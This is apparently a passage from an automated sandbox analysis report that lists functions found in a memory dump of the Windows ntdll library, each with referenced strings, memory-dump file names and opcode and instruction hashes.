                                                • Opcode ID: 75533116b4a891cf8e15ca52fb181baf3a622f0d8d4b9d462277cbcbf5094b2e
                                                • Instruction ID: 67ac2e12554edb7874959ace2ceeed1631cee77856e9728aa0f5fba2183831bd
                                                • Opcode Fuzzy Hash: 75533116b4a891cf8e15ca52fb181baf3a622f0d8d4b9d462277cbcbf5094b2e
                                                • Instruction Fuzzy Hash: 5D41BFF6A12254EFEB11DF55C980E6A3BB9EF04308F60446AEB219B350DA30C85DDF61
                                                Function 36D933A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlCreateActivationContext, xrefs: 36DD29F9
                                                • Actx , xrefs: 36D933AC
                                                • SXS: %s() passed the empty activation context data, xrefs: 36DD29FE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                • API String ID: 0-859632880
                                                • Opcode ID: 5ad2bd46ef62c87fe83b7028feb012ef4e128174562d8f7d3cf90773957cb936
                                                • Instruction ID: ff51f317a5dbb09268b9458f1a345a8a470a7476193fd9ddb83eaa932ebfcb5b
                                                • Opcode Fuzzy Hash: 5ad2bd46ef62c87fe83b7028feb012ef4e128174562d8f7d3cf90773957cb936
                                                • Instruction Fuzzy Hash: 57312F32A40315AFEB12DF69C880F9A77E4EF48B24F124469EE04DF681CB31D845CBA0
                                                Function 36DEB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                Download Yara Rule
                                                Strings
                                                • @, xrefs: 36DEB670
                                                • GlobalFlag, xrefs: 36DEB68F
                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 36DEB632
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                • API String ID: 0-4192008846
                                                • Opcode ID: e8d713c6eadd309c48266eb0e1c8fe77c0100cd2ed6fe853368c96105babc113
                                                • Instruction ID: 4a289223c669449439e4e9e733bd8f7f54531e4d5931ca9369b5bce73567c68c
                                                • Opcode Fuzzy Hash: e8d713c6eadd309c48266eb0e1c8fe77c0100cd2ed6fe853368c96105babc113
                                                • Instruction Fuzzy Hash: 7B315DB5D01219AFDB00EFA6DD80AEFBBB8EF44744F500469E605AB150D774EE04CBA5
                                                Function 36E013B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                • API String ID: 0-1050206962
                                                • Opcode ID: 51b12913d983b60f8c15ab8c6c1ef91248e055af7e0073729c4cc12950a8435f
                                                • Instruction ID: 7e015b1160d5a5a241ec1c3783871c902298feb52827c0422fc120945c45635e
                                                • Opcode Fuzzy Hash: 51b12913d983b60f8c15ab8c6c1ef91248e055af7e0073729c4cc12950a8435f
                                                • Instruction Fuzzy Hash: A5318076D00619BFEB01DFD6CC80EEEBBBDEB44658F450465E900A7220D738DD098BA2
                                                Function 36D91607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpInitializeTls, xrefs: 36DD1A47
                                                • DLL "%wZ" has TLS information at %p, xrefs: 36DD1A40
                                                • minkernel\ntdll\ldrtls.c, xrefs: 36DD1A51
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-931879808
                                                • Opcode ID: 8ce455bc040ead84501eaa6fa5cd22a952351b594482e55a6db26076fe9c78aa
                                                • Instruction ID: 94cad39837c4649becfa35d3962f0f1708ccb818449372275add640744e9713d
                                                • Opcode Fuzzy Hash: 8ce455bc040ead84501eaa6fa5cd22a952351b594482e55a6db26076fe9c78aa
                                                • Instruction Fuzzy Hash: 23319C72E10214EBF7149B59CC85FAA7BB9AB40798F550159E600BB280DB70FD49CBE1
                                                Function 36DA1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 36DA127B
                                                • BuildLabEx, xrefs: 36DA130F
                                                • @, xrefs: 36DA12A5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                • API String ID: 0-3051831665
                                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                • Instruction ID: bbd3f35145f5322e83590079a9cf584c0631f6bea779d96b16855066a50bb88d
                                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                • Instruction Fuzzy Hash: EC319F72904719AFDB11DF96CC40EEFBBB9EF84760F004425E914A7660DB30DA05DBA1
                                                Function 36D574B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: RtlValidateHeap
                                                • API String ID: 3446177414-1797218451
                                                • Opcode ID: 420c332dbfe3fbff0e857faa33b9848cf8899f83c7e8da2b1ea758a7542c0465
                                                • Instruction ID: 142323c28be8a223d663c04f728dc1c0eccbde38576812b1eef8af81ee0b5140
                                                • Opcode Fuzzy Hash: 420c332dbfe3fbff0e857faa33b9848cf8899f83c7e8da2b1ea758a7542c0465
                                                • Instruction Fuzzy Hash: 12413476B013559FEF02CF64C8847BEBBB2FF40254F298259E5529B684CB349905CBA1
                                                Function 36E0705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: kLsE
                                                • API String ID: 3446177414-3058123920
                                                • Opcode ID: be770fba12b587c6010726680d113aa977e8fe16445a22ceacd3b0c850dc4449
                                                • Instruction ID: 79e30a3045bbdf0fcffda9b8fd5f9b4c921d3073812a6e760fcb5e017897d358
                                                • Opcode Fuzzy Hash: be770fba12b587c6010726680d113aa977e8fe16445a22ceacd3b0c850dc4449
                                                • Instruction Fuzzy Hash: 4C417C729123418BEB159B73CC487653B96A700758F600618EF506B0D1C7B4C49FDFE2
                                                Function 36D752A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                • API String ID: 0-149943524
                                                • Opcode ID: 8c1da6467782068d13637be133181cee39e488446aaa33d7a96572ce761aa586
                                                • Instruction ID: f3cf34f92b511bc2ff56eb4b83f3266649dff17325072eafb5c7433e50f7644c
                                                • Opcode Fuzzy Hash: 8c1da6467782068d13637be133181cee39e488446aaa33d7a96572ce761aa586
                                                • Instruction Fuzzy Hash: 58329EB89083618BE714CF15C990B2EB7F1EF89784F50491EF9859B2A0EB34D954CB93
                                                Function 36D65702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: df6fb99b63d7bf68cccc362bf59606ab12cbf5304d68740d9d998079b96acdb1
                                                • Instruction ID: 8fc4f2c4dfa371a98a84d45b4202303bef42ccab14300eef2a972418d98c3eef
                                                • Opcode Fuzzy Hash: df6fb99b63d7bf68cccc362bf59606ab12cbf5304d68740d9d998079b96acdb1
                                                • Instruction Fuzzy Hash: 3A31EF35A11B1AEFE7459F22CE80E89FBB9FF44358F909025E94047A50DB71E820CBE1
                                                Function 36D7F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$
                                                • API String ID: 3446177414-233714265
                                                • Opcode ID: fbc8a344d25ea93b86474842c4d789b55b4c7e6e5cf01be2050e2e28da400310
                                                • Instruction ID: 95d7ec13cb39bd4528416899fd5b24fad4fb84be215b95218715de23345011b7
                                                • Opcode Fuzzy Hash: fbc8a344d25ea93b86474842c4d789b55b4c7e6e5cf01be2050e2e28da400310
                                                • Instruction Fuzzy Hash: 0B61CDB5E01749DFEB20CFA5C984BADB7B2FF44308F104469D525AF680CB34A945CBA2
                                                Function 36DF35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                • API String ID: 0-118005554
                                                • Opcode ID: 984b33d8e98b4a4c897dddef5a8b16e1532175b2597e88a5773e59b671a43692
                                                • Instruction ID: 061232bacf1c2ffbc857d201f8b4c70eefed98eea22e9707f04df1ebc475fadb
                                                • Opcode Fuzzy Hash: 984b33d8e98b4a4c897dddef5a8b16e1532175b2597e88a5773e59b671a43692
                                                • Instruction Fuzzy Hash: 4A31ED756193819BD301CF29D844B1AB3E4EF85754F030869F8848B790EB36D905CBE3
                                                Function 36D9329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local\$@
                                                • API String ID: 0-380025441
                                                • Opcode ID: 4f27fdafa4d3c7bf642d8cbb301c1eabbcd875b2a99bcf8e6771eea5282c8d18
                                                • Instruction ID: c9613f43d22914238ef64627e23a875e4a987c74e49b9062625f1dd29d87a967
                                                • Opcode Fuzzy Hash: 4f27fdafa4d3c7bf642d8cbb301c1eabbcd875b2a99bcf8e6771eea5282c8d18
                                                • Instruction Fuzzy Hash: D93170B6548704AFE311CF39C880A9BBBF8EF85694F45092EF59483650DA34DD09CBA3
                                                Function 36D934B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36DD2A95
                                                • RtlpInitializeAssemblyStorageMap, xrefs: 36DD2A90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                • API String ID: 0-2653619699
                                                • Opcode ID: c766178160783f8d7ce7125a5d30754dbec0004435b3f2128c05c05357ed676c
                                                • Instruction ID: c53131a58aaeaa662e21e9271d2b910bc51d9ce6a916d0332473ba33e75b4c51
                                                • Opcode Fuzzy Hash: c766178160783f8d7ce7125a5d30754dbec0004435b3f2128c05c05357ed676c
                                                • Instruction Fuzzy Hash: 2D112976B00214FBF7269B49CD41F9B76E9DF98B54F168069BA04EF240DA75CD00CAE4
                                                Function 36D8B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @[6@[6
                                                • API String ID: 0-1493792968
                                                • Opcode ID: 8903936f7673904c212ba195bfd24bac472fc77f6e34850302ecf89872d4f924
                                                • Instruction ID: c721c9435722d6d5f8e04adbaa6c6690abfae54e210afebca21872fd9fd67632
                                                • Opcode Fuzzy Hash: 8903936f7673904c212ba195bfd24bac472fc77f6e34850302ecf89872d4f924
                                                • Instruction Fuzzy Hash: 7132C1B6E00319DFDB14CFA9C885BAEBBB1FF88754F140129E815AB390E7359911CB91
                                                Function 36E331E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                                Download Yara Rule
                                                APIs
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 36E33356
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CallFilterFunc@8
                                                • String ID:
                                                • API String ID: 4062629308-0
                                                • Opcode ID: d5d39633e9a0f0a989a4899c96f2e5f27b33b2596ad099ec7763462abfbf15b3
                                                • Instruction ID: 9ce758217d0fb8f2d3af28c52084185589a0f20125063a70023977092941f8cc
                                                • Opcode Fuzzy Hash: d5d39633e9a0f0a989a4899c96f2e5f27b33b2596ad099ec7763462abfbf15b3
                                                • Instruction Fuzzy Hash: EEC158B99027598FDB20CF1AC984A99FBF0FF88304F6581AED54DA7210D734AA85CF40
                                                Function 36D61131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: cd360e4a2ff7bc7e6de10a11d27ec42979a3a8c38a9558421f847d1d3abf3a15
                                                • Instruction ID: 1467b9ff3ee9bacbca88182e2eb87ac503b4478fde266b3e5150bc85a13342af
                                                • Opcode Fuzzy Hash: cd360e4a2ff7bc7e6de10a11d27ec42979a3a8c38a9558421f847d1d3abf3a15
                                                • Instruction Fuzzy Hash: 0EB122B59083808FD754CF69C980A1AFBF1BF88308F54496EE899CB351D730E945CB92
                                                Function 36D67370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f4b5616082d71dd44888694146c8cbb0a8e429d91530113c41d88ff4e9a41f7
                                                • Instruction ID: d6d3dfd00569e330fef3f435890f7a331215235b02f094b23d91b47377a6a46d
                                                • Opcode Fuzzy Hash: 0f4b5616082d71dd44888694146c8cbb0a8e429d91530113c41d88ff4e9a41f7
                                                • Instruction Fuzzy Hash: 37A1AC75A08345CFE310CF29C884A1ABBF6FF88748F60496EE59597350EB70E945CB92
                                                Function 36D67703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a298770398eb22f7906450090e7f998bb9586095c2caf7fdcd2b6dfd965f4f37
                                                • Instruction ID: d085f061676a58efae71767c4d42e84fc0db20135ce40c5b585a7645d00b2ad5
                                                • Opcode Fuzzy Hash: a298770398eb22f7906450090e7f998bb9586095c2caf7fdcd2b6dfd965f4f37
                                                • Instruction Fuzzy Hash: 33616175E00609EFEB08CF79C884A9DFBB5FF88254F64826AD519A7310DB30A945CBD1
                                                Function 36D9F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9373250d0c9781b47ce1fe55ff04d9cce6d63ff669545d4caf1a5576da8ad8f7
                                                • Instruction ID: 9b634896bc422393e6d1e43fd73c0c0e195bb6a0e7ac298055e67346f8675df3
                                                • Opcode Fuzzy Hash: 9373250d0c9781b47ce1fe55ff04d9cce6d63ff669545d4caf1a5576da8ad8f7
                                                • Instruction Fuzzy Hash: 40414AB4D01388DFDB15CFAAC880AEDBBF5BB49340F50416EE598A7211DB319945CFA1
                                                Function 36D5B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 9e04d98922ee271191888116c9d1ad1bf743e98bb301112140e69c29dc827125
                                                • Instruction ID: 530ac7a454e3d036cbffcd9bb520dfa72e56dbd45f6cba86abfd133d10d18fd4
                                                • Opcode Fuzzy Hash: 9e04d98922ee271191888116c9d1ad1bf743e98bb301112140e69c29dc827125
                                                • Instruction Fuzzy Hash: CF3155725003049FDB15CF24C890A6A77B5FF843A4F524269EE444B691DB31EC06CFE1
                                                Function 36D657C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: cb41c8b4437437a4188eefc67bd5ad64ed7055baedafd8082c10faf7bdbb5ad3
                                                • Instruction ID: 0eb50c2a82f0026e7f91a97c49c776b0a995591de6de9650b0363545d7b4dab2
                                                • Opcode Fuzzy Hash: cb41c8b4437437a4188eefc67bd5ad64ed7055baedafd8082c10faf7bdbb5ad3
                                                • Instruction Fuzzy Hash: C0319E35A25A09FFE7459F25DE40E89BBA6FF84248F909025E94087F50DB31E830CBD2
                                                Function 36D63616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
